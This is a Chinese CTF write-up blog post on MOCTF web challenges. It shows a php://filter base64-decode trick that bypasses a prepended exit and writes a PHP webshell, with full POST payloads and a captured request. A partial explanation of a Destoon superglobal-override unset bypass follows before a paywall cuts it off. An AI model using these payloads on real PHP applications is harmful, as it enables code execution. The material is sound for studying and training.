简单记录一下MOCTF的三道web题

最新推荐文章于 2024-08-13 20:57:06 发布
最新推荐文章于 2024-08-13 20:57:06 发布
阅读量3.7k 收藏 3
点赞数 1
分类专栏: CTF Web 文章标签: MOCTF web writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011377996/article/details/79465199
版权
本文详细记录了解决MOCTF中三道web题目的过程,包括死亡退出的代码审计、unset的超全局变量覆盖问题,以及PUBG的源码泄露与反序列化漏洞利用。通过分析代码、构造payload并利用PHP特性,成功获取flag。
摘要由CSDN通过智能技术生成

本人渣渣,于是记录一下

死亡退出

一道代码审计题目

<?php
  show_source(__FILE__);
  $c="<?php exit;?>";
  @$c.=$_POST['c'];
  @$filename=$_POST['file']; 
  if(!isset($filename))                    
  {                                       
    file_put_contents('tmp.php', ''); 
  }                                 
  @file_put_contents($filename, $c);
  include('tmp.php');
?>

来看看代码,@是用来忽略错误
这段代码是利用最后的include执行temp.php,那么我们很快九形道运用伪协议把它给读出来。。但前提是要绕过"<?php exit;?>";不然会直接退出

这里搜到一篇文章用base64绕过的一篇文章
https://www.leavesongs.com/PENETRATION/php-filter-magic.html

这一题我本来是想用print_r('flag.php')构造的,发现不行,查了查手册发现是自己理解函数有问题
于是参考了方方土学长的构造,我使用<?php system('cat flag.php');?>
base64编码之后PD9waHAgZWNobyBmaWxlX2dldF9jb250ZW50cygiZmxhZy5waHAiKTs/Pg==

然后 

c=aPD9waHAgZWNobyBmaWxlX2dldF9jb250ZW50cygiZmxhZy5waHAiKTs/Pg==&file=php://filter/write=convert.base64-decode/resource=tmp.php

post参数c的时候会在<?php exit;?>后面加一些东西
所以会变成这个样子

<?php exit;?>aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==

然后经过base64decode之后就变成了下面的那个样子

^?Z<?php system('cat flag.php');?>

注意我的base64为什么前面多了个a,那是因为
在解码的过程中,字符<、?、;、>、空格等一共有7个字符不符合base64编码的字符范围将被忽略,所以最终被解码的字符仅有“phpexit”和我们传入的其他字符。
而phpexit一共7个字符,因为base64算法解码时是4个byte一组,所以给他增加1个“a”一共8个字符。这样,”phpexita”被正常解码,而后面我们传入的webshell的base64内容也被正常解码。

不知道为什么,最近用bp发包都搞不了这题,我是用火狐自带Hackbar发送post数据才在控制台下面看到的flag
我也很是奇怪。。。。用bp抓一下包用其comparer功能对比之后发现改的包没啥差异。。。。以后还是抓包还是先过一遍hackbar吧。。emmmm

最后经过Hackbar截的包

POST / HTTP/1.1
Host: 119.23.73.3:5003
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded
cache: no-cache
origin: moz-extension://d734739a-e2f8-430e-8dc3-796d3187dbc2
Content-Length: 126
Connection: keep-alive

c=aPD9waHAgZWNobyBmaWxlX2dldF9jb250ZW50cygiZmxhZy5waHAiKTs/Pg==&file=php://filter/write=convert.base64-decode/resource=tmp.php

unset

这道题目也是多亏了方方土学长指导我仔细看清楚这个漏洞,最后终于明白了

这个主要是利用了Destoon 20140530最新版超全局变量覆盖导致的安全问题
这是网址:http://www.secevery.com:4321/bugs/wooyun-2014-063895

如果 post get cookie 请求中的$$key$value相等 就unset掉$$key
如果我们向1.php?x=1提交一个POST请求 内容为_GET[x]=1
因为?x=1 所以$_GET内容为 array('x'=>'1'),但是这里没什么关系,如果没传post参数上去的话,遍历到第一个key的时候就会符合正则继而执行exit。。。。。这个自己尝试

如果传参post上去的话,当开始遍历$_POST的时候 $__k_GET[x] 所以$$__k 就是$_GET[x]也就是array('x'=>'1')
$__v是POST上来的一个数组 内容也是array('x'=>'1')
$

最低0.47元/天 解锁文章
0verWatch
关注
专栏目录
UMCTF2021-Writeup:MOCSCTF主持的UMCTF2021的文章
03-14
感谢以下提供协助: 感谢您提供的支持: 特鲁@MOCTF 梁锦@@ MOCTF 邦@MOCTF bluebear @ MOCTF RB916120 @ MOCTF molamola @ MOCTF Allon @ MOCTF T4rn @ MOCTF P0tato @ 20级茯苓@ 20级wyjbot @ 20级Mark0519 @ 20级...
web攻防世界7-12
weixin_51447909的博客
04-21 2999
攻防世界新手关
攻防世界 Web simple_php
MrTreebook的博客
03-05 1824
攻防世界 Web simple_php1.分析源代码2.得到flag 1.分析源代码 <?php show_source(__FILE__); include("config.php"); $a=@$_GET['a']; $b=@$_GET['b']; if($a==0 and $a){ echo $flag1; } if(is_numeric($b)){ exit(); } if($b>1234){ echo $flag2; } ?>
【CTF | WEB】002、攻防世界WEB目之simple_php
最新发布
韩非雨的博客
08-13 552
php中有两种比较符号,=== 会同时比较字符串的值和类型,== 会先将字符串换成相同类型,再作比较,属于弱类型比较。php中的弱类型比较会使‘abc’ == 0为真。
【攻防世界 simple_phpwriteup
Jhd_02的博客
10-26 442
http://61.147.171.105:52527
xctf攻防世界—Web新手练习区 writeup
Senimo
08-08 5408
xctf攻防世界—Web新手练习区 writeupview_sourceget_postrobotsbackupcookiedisabled_buttonsimple_jsxff_refererweak_authwebshellcommand_executionsimple_php view_source 难度系数: 1.0 目来源: Cyberpeace-n3k0 目描述:X老师让小宁同学查...
攻防世界 web simple_php
Kni9hT's Blog
02-29 756
XX:php是世界上最好的语言! 我:看不懂啊… (纯属娱乐,Java党勿喷) 解部分 php代码: <?php show_source(__FILE__); include("config.php"); $a=@$_GET['a']; $b=@$_GET['b']; if($a==0 and $a){ echo $flag1; } if(is_numeric($b)){ ...
ctf-web-攻防世界基础simple_php
baola的博客
07-20 1307
ctf-web-攻防世界基础simple_php思路
攻防世界 WEB 新手练习区 writeup 007-012
ChaoYue_miku的博客
09-02 1366
007 simple_php 难度系数:1.0 目来源: Cyberpeace-n3k0 目描述: 小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。 0x01 打开网页 有一段PHP源代码 0x02 进行代码审计 <?php show_source(__FILE__); include("config.php"); $a=@$_GET['a']; $b=@$_GET['b']; if($a==0 and $a){ echo $flag1; } if(is_numer
simple_php (攻防世界)
HackerYY的博客
11-14 2373
攻防世界simple_php 内附解过程
WEB2----php弱类型比较之最最基础
qq_51419052的博客
07-23 700
<?php show_source(__FILE__); include("config.php"); $a=@$_GET['a']; $b=@$_GET['b']; if($a==0 and $a){ echo $flag1; } if(is_numeric($b)){ exit(); } if($b>1234){ echo $flag2; } ?> PHP弱类型绕过 php类型比较 松散比较:使用两个等号==------只比较值,不比较类型(先将字符
攻防世界web笔记
weixin_64286326的博客
02-08 769
想着早点把任务完成,结果动态环境一直创建失败,麻了 加群反馈了,还是没有回复,先注册个小号得了 md 换个号还是这样,谢特
XCTF_Web_新手练习区:simple_php
1stPeak's Blog
06-13 6667
第十二:simple_php 目标: 掌握php弱类型比较 php中其中两种比较符号: ==:先将字符串类型转化成相同,再比较 ===:先判断两种字符串的类型是否相等,再比较 字符串和数字比较使用==时,字符串会先转换为数字类型再比较 var_dump('a' == 0);//true,此时a字符串类型转化成数字,因为a字符串开头中没有找到数字,所以转换为0 var_dump('123...
「干货」XCTF Web安全入门练习靶场全部通关教程
橙留香Park的博客
04-13 7091
转移发布平台通知:将不再在CSDN博客发布新文章,敬请移步知识星球... ...
详解文件包含漏洞
LYJ20010728的博客
05-28 1253
详解文件包含漏洞什么是文件包含文件包含漏洞成因php引发文件包含漏洞的四个函数文件包含漏洞的类型本地文件包含无任何限制限制包含文件的后缀名Session文件包含漏洞 什么是文件包含 为了更好地使用代码的重用性,引入了文件包含函数,通过文件包含函数将文件包含进来,直接使用包含文件的代码,简单点来说就是一个文件里面包含另外一个或多个文件 文件包含漏洞成因 文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致了执行了非预期的代码 例如:$_GET['filename']没
癞蛤蟆城堡
xf____的博客
12-24 73
项目场景: http://220.249.52.134:46493 问描述: 小宁听说php是最好的语言,于是她简单学习之后写了几行php代码。 原因分析: php中有两种比较符号 === 会同时比较字符串的值和类型 == 会先将字符串换成相同类型,再作比较,属于弱类型比较 解决方案: 1.打开页面,进行代码审计,发现同时满足 $a==0 和 $a 时,显示flag1。 2.php中的弱类型比较会使’abc’ == 0为真,所以输入a=abc时,可得到flag1,如图所示。(abc可换成任意字符)。 3.
simple_php-攻防世界
szhangliwenya的博客
03-21 1063
再次解释举例内容:数字和字符串比较中,字符串转换成数字的过程中,会取字符串前面数字的值作为整个字符串转换成数字的值,比较“1admin”,转换成数字就是1,所以"admin"的话,因为字符串没有数字,只能转换成0了,所以if("admin"==0) 会是true。是一个严格的整数或浮点数,而不是以数字开头的字符串,那么可能需要使用更严格的验证方法,例如正则表达式或类型转换检查。的值来自 URL 的 GET 参数,没有进行适当的输入验证或清理,这可能导致潜在的安全风险,特别是如果。直接构造playload。
moctf2018新春赛misc出及解日志
saltyfish_yuch的博客
02-14 2477
关于moctfMOCTF平台是CodeMonster(厦门理工学院)和Mokirin(集美大学)这两支CTF战队所搭建的一个CTF在线答系统。目形式与各大CTF比赛相同。目的是为两个学校中热爱信息安全的同学们提供一个刷的平台,能够一起学习、进步。0x01. 流量分析 出思路:在路由器telnet过程中抓包获取密码。 解法:分析telnet包获取字符,拼接成flag。moctf{c@N_y0...
Writeup of MOCTF
MozhuCY的博客
02-01 1624
RE: 0x00:SOEASY逆向的签到,扔进IDA搜索字符串,本来想定位下主函数,结果直接看到了flag。  0x01:跳跳跳打开dump.exe发现居然是掷色子的游戏..很明显爆破,OD载入找到关键跳,直接吧jnz改成je...或者从开头直接跳到最后hhhhhhhhh,得到一串base64,解之得到flag。  0x02:听小姐姐的话此官方并没放出..  0x03:暗恋的苦恼得到一个jia...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值